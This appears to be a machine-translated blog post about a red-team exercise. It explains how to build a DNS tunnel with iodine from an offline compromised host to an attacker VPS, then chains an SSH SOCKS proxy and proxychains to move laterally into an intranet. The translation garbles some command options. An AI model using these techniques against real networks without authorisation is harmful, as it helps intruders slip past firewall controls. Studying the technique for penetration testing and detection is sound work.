DNS tunnel for Intranet penetration

Author: D1m0n

preface

At the beginning of the year, I had the honor to participate in an HVV. I was mainly responsible for Intranet penetration, including agent building and horizontal movement. At that time, but also just contact network not two months, driving ducks on the shelves to learn once on the battlefield. Fortunately, I got the system permission through webLogic’s deserialized RCE. Later, I found an embarrassing problem that the target host was not online. With the help of search engines, the big guys were using reGeorgh and Pystinger, both of which use Webshell to carry out SOCKS proxy, so as to penetrate the Intranet. Behind does also achieve the goal, into the internal water wave points. Return to the school of the time, found that there is a more powerful posture… Set up a DNS tunnel.

DNSThe tunnel is introduced

DNS tunnel is one of the tunneling technologies. When upper-layer protocols such as HTTP and HTTPS fail to forward or forward port forwarding, DNS tunnels can be used. DNS tunnels are difficult to defend against, because the DNS protocol is inevitably used for resolution in normal services and applications. Therefore, the firewall allows DNS traffic. At this time, if we construct a malicious domain name (***.test.cn) in the offline machine, and the local DNS server cannot answer, we will locate the authoritative DNS server of the queried domain through the Internet in the way of iterative query. Finally, the DNS request will land on the malicious DNS server that we set up in advance, so that our offline host will communicate with the malicious DNS server.

DNSRecommended tools for constructing tunnels

There are many tools for DNS tunnel construction, including Sulfur, DNS2tcp,DNScat and so on. After comprehensive experience, I recommend you to use sulfur, very simple and convenient.

Lead to

Since we need to use DNS service on our VPS, we need to configure the domain name first. Here is an example of a cloud:

The first class A record tells the DOMAIN name system that the IP address of “DNS.xxx.com” is “175.xxx.xxx.xxx”.

The second NS record tells the DNS system that the domain name of “DNS2tcp.xxx.com” is resolved by “DNS.xxx.com”.

Finally, the DNS of “DNS2tcp.xxx.com” will be resolved by the host of “175.xxx.xxx.xxx”, which is our VPS.

After the configuration is complete, ping DNS.xxx.com to check whether the ping succeeds.

I tunnel

1. Install Iodine. Here I use Linux as an example. If it is Windows system, download and install the corresponding version of Iodine.

apt-get install iodine
Copy the code

2. Run iodined server on VPS, after which a virtual NIC address will be added to VPS:

Iodined -f -c -p d1m0n 192.168.0.1 'DNS' 2tcp.xxx.com -dd 
 #-f: Runs in foreground
 #-c: Does not check the client IP addresses of all incoming requests.
 #-p: indicates the password used for authentication between the client and server.
 #-d: indicates the debugging level. -dd indicates the second level. The number of "D's" increases with the level.
 #192.168.0.1 is the virtual IP address of the user-defined LAN. Do not conflict with the existing network segment
 #Attention! The address is NS record
Copy the code

3. Run client loot, here using Kali, kali is installed for loot by default:

iodine -f -P d1m0n `DNS`2tcp.xxx.com  -M 200

#-r: DNS tunnels are sometimes automatically switched to UDP tunnels, forcing DNS tunnels to be used in any case
#-m: specifies the size of the uplink host.
#-m: Adjusts the size of the maximum downlink fragment.
#-f: Runs in foreground
#-t: specifies the DNS request TYPE. The options are NULL, PRIVATE, TXT, SRV, CNAME, MX, or A.
#-o: specifies the data encoding specification.
#-p: indicates the password used for authentication between the client and server.
#-l: specifies whether to enable the lazy mode. This mode is enabled by default.
#-i: specifies the interval between two requests.
Copy the code

Ping VPS(IP :192.168.0.1) to see if the DNS tunnel can be set up:

At this point, our mission is only half done, for Intranet penetration, we definitely need to move laterally. There are many socks proxy tools. Here is a relatively simple and portable SSH. SSH is usually used to log in to remote hosts, and all transmitted content is encrypted. Suppose that we use the malicious DNS server as a jumper and Kali as an attack machine, and configure it on Kali’s side:

SSH -n -d 8080 [email protected] # -n tells SSH not to start shell because we just want to create proxy # -d set dynamic port forwarding, SOCKS proxy port is 8080 #user User on our server #192.168.0.1 tun server on interfaceCopy the code

After the VPS SSH password is entered, the forwarding starts. Here configure ProxyChainS4

vim /etc/proxychains4.conf 
Copy the code

Finally, to verify whether our agent has been set up:

proxychains4 curl http://www.baidu.com
Copy the code

Done, behind is the network roaming time ~